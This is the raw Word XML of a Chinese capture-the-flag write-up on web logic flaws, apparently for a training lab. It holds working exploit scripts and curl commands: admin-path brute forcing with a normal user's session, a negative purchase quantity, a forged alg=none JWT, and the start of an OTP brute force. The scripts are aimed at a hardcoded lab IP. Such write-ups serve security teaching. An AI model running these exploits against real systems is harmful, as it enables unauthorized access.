          <w:p w14:paraId="426A6CCE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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52C60F3C">
            <w:pPr>
              <w:pStyle w:val="12"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4772660" cy="4629785"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="0"/>
                  <wp:docPr id="3599640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96408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691" cy="4629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81F8D1">
            <w:pPr>
              <w:pStyle w:val="12"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0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找到flag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BBDEA7C">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:t>任务2. 垂直越权</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19400D05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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4563110" cy="2095500"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="0"/>
                  <wp:docPr id="6690994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09944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209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5AC7A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1. 登录普通用户拿 Cookie</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0636946C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curl -s -c /tmp/q31.ck -X POST \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76E8AD60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-d "username=user&amp;password=user123" \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57503A47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http://目标地址/login -o /dev/null</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BD8A01E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user/user123 来自登录框 placeholder 提示。-c 保存 PHPSESSID。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00836F13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4D48ED04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2. 撞 /admin（确认硬壁垒）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01B98661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curl -s -b /tmp/q31.ck http://目标地址/admin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4564E09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 输出: 403 · 你不是管理员   （25 字节）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A09319D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3. 记录两条基线 size</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DC13152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 首页 fallback (登录后未授权访问的默认响应)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="578DF61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curl -s -b /tmp/q31.ck -o /dev/null -w "%{size_download}\n" \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C26F8B7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http://目标地址/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E208A4D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 165</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="416695B2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任何返回</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> size 既不是 25（403）也不是 165（fallback） 的子路径 = 命中新路由。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1789B2E5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18A0BDE1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4. 子路径爆破</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69A12D8A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for p in admin/console admin/manage admin/users admin/export \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="675CE7F0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admin/secret admin/data admin/backup admin/panel \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="723AD61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admin/logs admin/dashboard admin/config; do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56347D35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r=$(curl -s -b /tmp/q31.ck -o /dev/null \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36B44B7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-w "%{http_code}|%{size_download}" \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC0260B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http://目标地址/$p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F80399C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[[ "${r#*|}" != "165" &amp;&amp; "${r#*|}" != "25" ]] &amp;&amp; echo "[HIT] $r /$p"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46428357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Done</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15635A0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4B1FB1F8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爆破脚本</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54214482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#!/usr/bin/env python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B4E16EE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import atexit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD26AED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import os</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CF1A671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"""Q31 - IDOR 垂直越权 (BFLA) 自动化解题脚本</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D8B2FD7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利用点</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>: /admin 检查了 role, 但 /admin/secret 漏检 role，仅检查登录态。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FB72F6F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"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71A3977A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import re</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BF72193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import sys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42CFE0CA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import requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BEF7DCC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6DB9E1D5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os.environ["NO_PROXY"] = "*"  # 防止代理污染：脚本只访问 127.0.0.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F19A9B5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66904C02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 ========== 修改这里的 IP 地址 ==========</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48C0DEF7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BASE = os.environ.get("GKD_URL") or ("http://47.120.58.147:35301")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A367556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 =====================================</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0640224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65700D47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USER, PASS = "user", "user123"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16BA56EE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05A59ECA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 常见 admin 子路径词表（命中率排序）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC952F2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WORDLIST = [</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F7FE427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"admin/console", "admin/manage", "admin/users", "admin/user",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1860AEFF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"admin/export", "admin/secret", "admin/data", "admin/backup",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="502625CE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"admin/panel", "admin/logs", "admin/dashboard", "admin/config",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62854060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"admin/settings", "admin/api", "admin/debug", "admin/info",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D039C56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"admin/private", "admin/shell", "admin/sql", "admin/db",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E915393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]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2840216B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3F4ED8D1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4EE0A6B0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def main():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B6782D5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s = requests.Session()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D12F77F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0BADC657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# Step 1: 登录普通用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="249EAD2E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s.get(f"{BASE}/login")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="766692AD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r = s.post(f"{BASE}/login",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5815F64D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   data={"username": USER, "password": PASS},</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D96C0C3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   allow_redirects=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B6DDC0B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assert r.status_code == 302, f"登录失败: {r.status_code}"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="409F7EB8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print(f"[+] 登录成功 (PHPSESSID={s.cookies.get('PHPSESSID')})")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41CD21E6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759A5236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# Step 2: 探测基线 (首页 fallback size &amp; /admin 403 size)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C50E3C5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home_size = len(s.get(f"{BASE}/").content)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="063EC3AD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admin_r = s.get(f"{BASE}/admin")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30E585C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print(f"[+] 基线: 首页 size={home_size} | /admin -&gt; {admin_r.status_code} size={len(admin_r.content)}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="704A43DD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print(f"[+] /admin 内容: {admin_r.text.strip()[:80]}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C1A58F0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49D2DF81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# Step 3: 爆破子路径，过滤 fallback (size==home_size) 和 /admin (403)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39D53C7E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print(f"[*] 爆破 {len(WORDLIST)} 个 admin 子路径...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="447E8571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hits = []</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44D20775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for path in WORDLIST:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4874F150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rr = s.get(f"{BASE}/{path}", allow_redirects=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="495A73C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if rr.status_code == 200 and len(rr.content) != home_size:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E18CB2D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print(f"    [HIT] /{path} -&gt; {rr.status_code} size={len(rr.content)}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08373912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hits.append(path)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4995121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76E42983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# Step 4: 读取命中接口提取 flag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A197E07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for path in hits:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F049AB3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body = s.get(f"{BASE}/{path}").text</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EAF9BCB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m = re.search(r"(TOGOGO-flag\{[^}]+\})", body)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F8A1A0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if m:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A5D39AA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print(f"\n[*] FLAG = {m.group(1)}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3579EDA0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print(f"[*] 来源: /{path}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="219DD5D0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return 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F20595D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print("[-] 未找到 flag", file=sys.stderr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57112597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return 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47DC05C5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5ED63054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5A08F795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if __name__ == "__main__":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B071A05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sys.exit(main())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58FADE82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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5106035" cy="1581150"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="12995746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57460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6113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96905">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:t>任务3. 负数金额逻辑漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DF338B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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5274310" cy="2278380"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
                  <wp:docPr id="16473764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37647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7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B406E8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:num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打开首页，F12 → Network。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7179B244">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:num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把"机密物料"那一行数量框里的 1 改成 -1，点购买。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64B8DF8D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:num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在 Network 里看 /buy 的响应，flag 字段就是答案。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B1A0143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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5274310" cy="2106295"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
                  <wp:docPr id="14165078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50784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0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66468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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5274310" cy="278765"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
                  <wp:docPr id="17369926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99260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EB3B7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:t>任务4. 密码重置Token泄露</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71623372">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5274310" cy="2009775"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
                  <wp:docPr id="2505287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52872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F2913">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5125085" cy="3257550"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="12951502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15020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65" cy="325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49EA9F">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5274310" cy="1536700"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
                  <wp:docPr id="7865321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53217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3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C386">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="2647950" cy="1447800"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="14259718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97180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320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548CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5274310" cy="2592070"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="5694200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42002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9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CDBBF1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5274310" cy="2155190"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="18187677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76774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5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0F48A">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:t>任务5. JWT算法降级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4013BEB6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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5274310" cy="1541780"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
                  <wp:docPr id="390100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1000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4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22089F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1. 登录拿对照 token（可选，确认接口在线）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35B1A69C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curl -X POST http://目标地址/api/login \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B518968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-d "username=guest&amp;password=guest123"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="021159B7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 {"ok":true,"token":"eyJhbGciOiJIUzI1NiIs...role:user 的 HS256 token"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EAB6991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2. 用 guest token 访问 /api/flag → 被拒（确认权限模型）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40FDC056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curl http://目标地址/api/flag \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61C879EF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-H "Authorization: Bearer &lt;上一步的 token&gt;"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62FAA5BB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 {"ok":false,"msg":"admin only"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44B4E3F4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3. 本地伪造 alg=none token（无需任何依赖）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A99EC7E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JWT = base64url(header) . base64url(payload) . signature。alg=none 时签名段留空，但末尾点必须保留。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E128A5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18523361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python3 -c "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2489C8D0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import base64, json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54E98C5B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b=lambda d: base64.urlsafe_b64encode(json.dumps(d,separators=(',',':')).encode()).rstrip(b'=').decode()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EBA7320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h=b({'alg':'none','typ':'JWT'})</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71DF53F6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p=b({'user':'admin','role':'admin'})</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA4ED32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print(f'{h}.{p}.')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="152C4F23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"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FE4BF7D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输出（可直接复制）：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65930D14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55699CF8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eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FB7B4BA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4. 用伪造 token 访问 /api/flag → 拿 flag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="559D2D38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TOKEN='eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ.'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09DC9B88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6F47703E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curl http://目标地址/api/me   -H "Authorization: Bearer $TOKEN"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22A9F170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 {"ok":true,"payload":{"role":"admin","user":"admin"}}   ← 服务端接受 none</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CA0135A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54135057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curl http://目标地址/api/flag -H "Authorization: Bearer $TOKEN"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E4409F3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 {"ok":true,"flag":"TOGOGO-flag{}"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EEAEDF4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79FFD117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爆破脚本：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="615BFABD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#!/usr/bin/env python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20AF17FA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import atexit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78379A33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import os</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08238234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atexit.register</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5546B91D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"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15387E88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Q35 - 逻辑漏洞 · JWT 算法降级 (alg=none)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="335AD796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目标</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>: http://47.120.58.147:35305</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F0D6777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原理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>: 服务端 decode_token 信任 header 自声明的 alg；当 alg=none 时走</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00470F22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jwt.decode(token, options={'verify_signature': False}) 分支，</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="411C4918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完全跳过签名校验。攻击者可任意伪造 payload。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="752CEAF8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"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="573F1EBC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import base64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B8AE8D7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import json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B135215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import sys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F40982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import urllib.request</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C1A675C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import urllib.parse</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BFC280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2398C59A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os.environ["NO_PROXY"] = "*"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36E160BD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7F490A8C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 修改为目标地址</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30269F8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TARGET = "http://47.120.58.147:35305"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C31C37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5C1E54D4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def b64url(obj: dict) -&gt; str:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12A9239B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raw = json.dumps(obj, separators=(",", ":")).encode()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DC7BBEF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return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7281BCBA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763223FA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def http(method: str, path: str, data=None, token: str = "") -&gt; dict:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C9B2A1F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url = TARGET + path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67ABF4A6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body = urllib.parse.urlencode(data).encode() if data else None</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AD57B37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req = urllib.request.Request(url, data=body, method=method)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AE4D0EE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if token:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37304681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req.add_header("Authorization", f"Bearer {token}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="520D8912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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C5058F2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with urllib.request.urlopen(req, timeout=10) as resp:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61711AD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return json.loads(resp.read().decode())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B1FD611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except urllib.error.HTTPError as e:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F641ED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return {"error": str(e), "body": e.read().decode()}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F00280C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240D3D90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def main() -&gt; int:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AFF71B0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# Step1: 登录拿对照 token（仅用于确认接口与 payload 结构）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24B94581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print("[*] 尝试登录...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72AC342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login = http("POST", "/api/login",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="535A01FA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     data={"username": "guest", "password": "guest123"})</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F0AC20A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print("[+] login:", login)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AC2DAE4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40542DD3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# Step2: 构造 alg=none 伪造 token</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="786EDF0D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header = {"alg": "none", "typ": "JWT"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="506FE90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payload = {"user": "admin", "role": "admin"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="704BED16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forged = f"{b64url(header)}.{b64url(payload)}."   # 末尾点必须保留</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BD357A2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print("[+] forged token:", forged)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D5B864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530FCCAA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# Step3: 用 /api/me 自检 payload 是否被接受</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="202B64A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me = http("GET", "/api/me", token=forged)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BC16523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print("[+] /api/me:", me)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0551BCF8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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BCB33FC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if me.get("payload", {}).get("role") == "admin":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D9625BC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print("[+] alg=none 生效！")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7432794E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else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F64A7A3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print("[-] alg=none 可能未生效，继续尝试...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="637FED42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3DBDDD0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# Step4: 拿 flag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37D576DD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res = http("GET", "/api/flag", token=forged)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="133DD8E6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print("[+] /api/flag:", res)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46B6B683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flag = res.get("flag")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A8499F3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if flag:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C1301B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print(f"\n[FLAG] {flag}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00361F7B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return 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37625C2B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print("[-] 未拿到 flag")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5376B716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return 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C5AAA93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0D4E8C3E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if __name__ == "__main__":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6704156D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480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sys.exit(main())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07D4AD91">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5274310" cy="969645"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
                  <wp:docPr id="20559519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95198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6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9CA2B">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:t>任务6：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>OTP无速率限制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CDCF1E4">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5274310" cy="1283335"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="17455888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58889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8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0EE88E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1. 摸接口（30 秒）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AFC51D2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 登录页（看到表单字段：username / otp）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CDBD501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curl -s http://目标地址/ | grep -E 'form|input'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="488780F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116BA2CE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 试一次错误 OTP，观察响应</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69518436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curl -i -s -X POST http://目标地址/verify \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="774A017A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-d 'username=admin&amp;otp=000000'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D279ACE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 HTTP/1.1 401 UNAUTHORIZED   →   body: wrong otp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="236AC9D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2. 验证「无防御」（10 秒）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52CE4ACB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连发</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
